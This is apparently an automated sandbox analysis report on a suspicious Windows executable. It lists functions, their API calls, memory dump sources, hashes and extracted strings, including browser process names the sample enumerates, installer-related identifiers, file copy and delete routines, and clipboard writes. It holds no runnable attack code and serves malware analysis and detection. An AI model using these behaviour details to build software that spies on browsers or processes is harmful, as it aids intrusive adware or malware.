                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: bc9f7fcad917f804a4cb638df0614e6a56020e0bb46d1f55b358342282b53f78
                                                                                                                                                                                                          • Instruction ID: 924f2406c5575dd430c412869953e39048321f496b9924ae61f61d38cc9c7187
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc9f7fcad917f804a4cb638df0614e6a56020e0bb46d1f55b358342282b53f78
                                                                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 00462370 Relevance: 53.3, APIs: 7, Strings: 23, Instructions: 777windowtimeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlInitializeCriticalSection.NTDLL(00597D08), ref: 0041BFCE
                                                                                                                                                                                                            • Part of subcall function 0041BF60: __Init_thread_footer.LIBCMT ref: 0041BFEA
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlEnterCriticalSection.NTDLL(00597D08), ref: 0041C005
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlLeaveCriticalSection.NTDLL(00597D08), ref: 0041C115
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,0000000F), ref: 00462B83
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00462B8B
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00462BFD
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00462C0A
                                                                                                                                                                                                            • Part of subcall function 00455FD0: RtlInitializeCriticalSection.NTDLL(00597E94), ref: 0045603E
                                                                                                                                                                                                            • Part of subcall function 00455FD0: __Init_thread_footer.LIBCMT ref: 0045605A
                                                                                                                                                                                                            • Part of subcall function 00455FD0: RtlEnterCriticalSection.NTDLL ref: 00456075
                                                                                                                                                                                                          • KillTimer.USER32(?,00000550,0000000F), ref: 00462C5D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterInit_thread_footerInitializeMessagePostQuitShowWindow$Affinity::operator!=Concurrency::details::HardwareKillLeaveTimerstd::locale::facet::facet
                                                                                                                                                                                                          • String ID: %ds$/qy/pp$P}A$TBY$appid$avlt$avs$btn_Close$click$close$countdown_text1$countdown_text2$down$install$item$js=$menu$pid$rnd$sid$tid$type$uid
                                                                                                                                                                                                          • API String ID: 3681526160-3787827338
                                                                                                                                                                                                          • Opcode ID: 0fb39c0d51a6938a7f6555bcb8cca7d40535ef37f5b2e9bbfd682352fc7445de
                                                                                                                                                                                                          • Instruction ID: ed17486b76200998b7f1adbb282c11307a059de2f7680e70323ee0329921b126
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fb39c0d51a6938a7f6555bcb8cca7d40535ef37f5b2e9bbfd682352fc7445de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B362D430911248EFDB24EF64CD45BEEBBB5BF50304F1084AEF049A7192DB786A44DB96
                                                                                                                                                                                                          Function 00436530 Relevance: 29.6, APIs: 3, Strings: 13, Instructions: 1581COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlInitializeCriticalSection.NTDLL(00597D08), ref: 0041BFCE
                                                                                                                                                                                                            • Part of subcall function 0041BF60: __Init_thread_footer.LIBCMT ref: 0041BFEA
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlEnterCriticalSection.NTDLL(00597D08), ref: 0041C005
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlLeaveCriticalSection.NTDLL(00597D08), ref: 0041C115
                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,EFE0703F,?,00000000), ref: 004365AC
                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF,?,?,?,00000000), ref: 00436658
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0043666A
                                                                                                                                                                                                            • Part of subcall function 0043BE40: GetCurrentProcessId.KERNEL32(00000000), ref: 0043BECD
                                                                                                                                                                                                            • Part of subcall function 0043BE40: PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 0043BEE1
                                                                                                                                                                                                            • Part of subcall function 00483970: GetProcAddress.KERNEL32 ref: 004839FF
                                                                                                                                                                                                            • Part of subcall function 00483970: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00483A15
                                                                                                                                                                                                            • Part of subcall function 00483970: Process32FirstW.KERNEL32(00000000,?), ref: 00483A24
                                                                                                                                                                                                            • Part of subcall function 00483970: Process32NextW.KERNEL32(00000000,?), ref: 00483A4C
                                                                                                                                                                                                            • Part of subcall function 00483970: CloseHandle.KERNEL32(00000000), ref: 00483A53
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CloseCreateHandleProcess32$AddressCurrentEnterEventFirstInit_thread_footerInitializeLeaveMessageMultipleNextObjectsPostProcProcessSnapshotToolhelp32Wait
                                                                                                                                                                                                          • String ID: 2345Explorer.exe$360chrome.exe$360se.exe$InsLnk.xml$Maxthon.exe$QQBrowser.exe$SLBrowser.exe$UCBrowser.exe$chrome.exe$firefox.exe$iexplore.exe$msedge.exe$sogouexplorer.exe
                                                                                                                                                                                                          • API String ID: 208262335-949901600
                                                                                                                                                                                                          • Opcode ID: 6c3f18b88190fae4ccd2eb9adb9a1bd77c4126660fac841e6ae9cf4e3b814cec
                                                                                                                                                                                                          • Instruction ID: 6458ee337c35b555381e9a9a956d28feeed5d9ff87ac979860b992d9eed53f7e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c3f18b88190fae4ccd2eb9adb9a1bd77c4126660fac841e6ae9cf4e3b814cec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE2C270A002499BEF14DFA4C9497DEBBF0BF48318F20955DE044B72D1D779AA84CBA9
                                                                                                                                                                                                          Function 0048E0D0 Relevance: 16.6, APIs: 11, Instructions: 132fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0048E3D0: GetProcAddress.KERNEL32(?,?), ref: 0048E477
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,EFE0703F,00000000), ref: 0048E12B
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0048E163
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0048E16B
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0048E186
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0048E18E
                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0048E1AE
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 0048E1C4
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0048E1E5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0048E201
                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00597A94,00000010,0048E01B,00000000), ref: 0048E221
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0048E23B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Find$Close$CreateFirst$AddressCopyDeleteHandleProcReadSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3568010720-0
                                                                                                                                                                                                          • Opcode ID: 1bcc698940b050a87a3460eb661652275ec14e984550a024991a6b27c8852973
                                                                                                                                                                                                          • Instruction ID: 2254858a8e7ea8ba69ba115cdd798485c29968c93dc362b28c87a447cb02ec91
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bcc698940b050a87a3460eb661652275ec14e984550a024991a6b27c8852973
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0515B30A00208EBDF10DFA9DC89FEEB7B8AF15715F500529F512A21D0D778AA49CB94
                                                                                                                                                                                                          Function 004AA100 Relevance: 10.6, APIs: 7, Instructions: 53clipboardmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,?), ref: 004AA134
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004AA13D
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004AA166
                                                                                                                                                                                                          • OpenClipboard.USER32(?), ref: 004AA175
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004AA17B
                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004AA184
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004AA18A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1677084743-0
                                                                                                                                                                                                          • Opcode ID: 7e6d951e6f4ecf3f2143712e6c98a060afa0d87735fdf84fe4fa1db045409ecf
                                                                                                                                                                                                          • Instruction ID: 1647e85f9f82e15e28d7ff5b51ab08a8df37cd059c9dc8d6b448e44361d9f090
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e6d951e6f4ecf3f2143712e6c98a060afa0d87735fdf84fe4fa1db045409ecf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD118E7A200104EFC7049B6CEC4DDEAB7E9EF99319B01407AF905C3261DE716D55DBA0
                                                                                                                                                                                                          Function 004E60D0 Relevance: 7.8, APIs: 5, Instructions: 304networkCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLastselect
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 215497628-0
                                                                                                                                                                                                          • Opcode ID: 0594a2ba5b3b075db490b6cc339492106e3470f784b45f8ef1857d275e62f01e
                                                                                                                                                                                                          • Instruction ID: cb12d01848e67e8695e53949726a8b445c0ef83839fa103a8f55cf472563cd01
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0594a2ba5b3b075db490b6cc339492106e3470f784b45f8ef1857d275e62f01e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C1A170A002598BCF25DF1AC8847EAB7B9EFA8351F1145EED859D3241DB349F808F58
                                                                                                                                                                                                          Function 0052E24E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000003,?,0052E224,00000003,0058C878,0000000C,0052E37B,00000003,00000002,00000000,?,0052DBEB,00000003), ref: 0052E26F
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0052E224,00000003,0058C878,0000000C,0052E37B,00000003,00000002,00000000,?,0052DBEB,00000003), ref: 0052E276
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0052E288
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                          • Opcode ID: cfaea127e8a4d635fc17d4b6892199e49b5bb71ec14c1f5bab0d1a56e5d5a11f
                                                                                                                                                                                                          • Instruction ID: bb4af38821257ac5eb18e4c3d4b7169c6755c4d774b94cbfca06548bcaece3cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfaea127e8a4d635fc17d4b6892199e49b5bb71ec14c1f5bab0d1a56e5d5a11f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6E04639000218EBCF116F68ED0EAC93F29FF9A385F000420F9068A172CB35DD82DB90
                                                                                                                                                                                                          Function 0048C060 Relevance: .7, Instructions: 689COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2cbd4bc03c2f98ab6b08e74557608eeff6a804ea3af12b96a96b93698a18d79f
                                                                                                                                                                                                          • Instruction ID: 7325c14cabff80c909aba46fb5bbc2b4f25a0acf6f5370f46a76909437fb4aa4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cbd4bc03c2f98ab6b08e74557608eeff6a804ea3af12b96a96b93698a18d79f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E320BB3F512188BC744CEADCC817CDB7E3BF98218B1E8539D818E7705E679E9064A84
                                                                                                                                                                                                          Function 005404C0 Relevance: .7, Instructions: 651COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b7688787b532c6dce88ffd6ada8292673a884a1ae1366bdf36143754700c8199
                                                                                                                                                                                                          • Instruction ID: 08d0822a38c0c6751f338ecb999079686fca21416788d3447352c01b68f303fe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7688787b532c6dce88ffd6ada8292673a884a1ae1366bdf36143754700c8199
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E321331D69F014DD7239638D862379A658BFB33C8F24E737E91AB59A6EB3884C35100
                                                                                                                                                                                                          Function 00492070 Relevance: .4, Instructions: 358COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9992add13bc3bd07cf6dc0898450bfb70dc87b1a3b87cfe70b8ca72476def30f
                                                                                                                                                                                                          • Instruction ID: 5c1e43c76f56f2af1683a6878a67d761d79f10928772b2e770fbabc8dddbff88
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9992add13bc3bd07cf6dc0898450bfb70dc87b1a3b87cfe70b8ca72476def30f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F11931E011298FDF24CF18CA90BEDBBB1BB98314F1581EAD90DA7341DA74AE858F54
                                                                                                                                                                                                          Function 00494420 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7a87d76c79b2e81b899c93e3d72fae80859dcf44d894491618ebacf60d612e22
                                                                                                                                                                                                          • Instruction ID: f6ee02d2a1d49515d4794013b4413ae37ce8a737e3a576a755a4ab475cf2a53a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a87d76c79b2e81b899c93e3d72fae80859dcf44d894491618ebacf60d612e22
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE2171705301B5078B0C8B3AE8F4536BFE0DB8629334B426FE486DA485D939D575A7A4
                                                                                                                                                                                                          Function 00466210 Relevance: 56.3, APIs: 29, Strings: 3, Instructions: 267registrywindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00466275
                                                                                                                                                                                                          • RegisterClassExW.USER32 ref: 00466290
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 0046629A
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,ZCNMNBVCXZTP,00000000,86CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004662B7
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,00000030), ref: 004662DF
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0000006B,?,?,?,?,?,?,?,00000030), ref: 00466306
                                                                                                                                                                                                          • LoadIconW.USER32(00000000), ref: 00466309
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000030), ref: 00466333
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule$Window$ClassCreateIconLoadPathRegisterShowTemp
                                                                                                                                                                                                          • String ID: 0$ZCNMNBVCXZTP$tp%I64d.ico
                                                                                                                                                                                                          • API String ID: 244549989-2830416069
                                                                                                                                                                                                          • Opcode ID: 97698d29cbca3f3fe1d604c142f1b1d138738d512f44c8785b852b61c3c597a7
                                                                                                                                                                                                          • Instruction ID: 044d5cf413f88435dded9a6980bf418663109767c9ab0a1025430e0beb0798e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97698d29cbca3f3fe1d604c142f1b1d138738d512f44c8785b852b61c3c597a7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7A190B1644701BBE710DF64DC0AF97BBA8BB44714F00462AF618D72D0EBB4E418DBA6
                                                                                                                                                                                                          Function 004F0550 Relevance: 47.5, APIs: 19, Strings: 8, Instructions: 204COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 004F057A
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F05A3
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 004F05B5
                                                                                                                                                                                                          • __allrem.LIBCMT ref: 004F05DA
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F05E8
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F05F8
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 004F060A
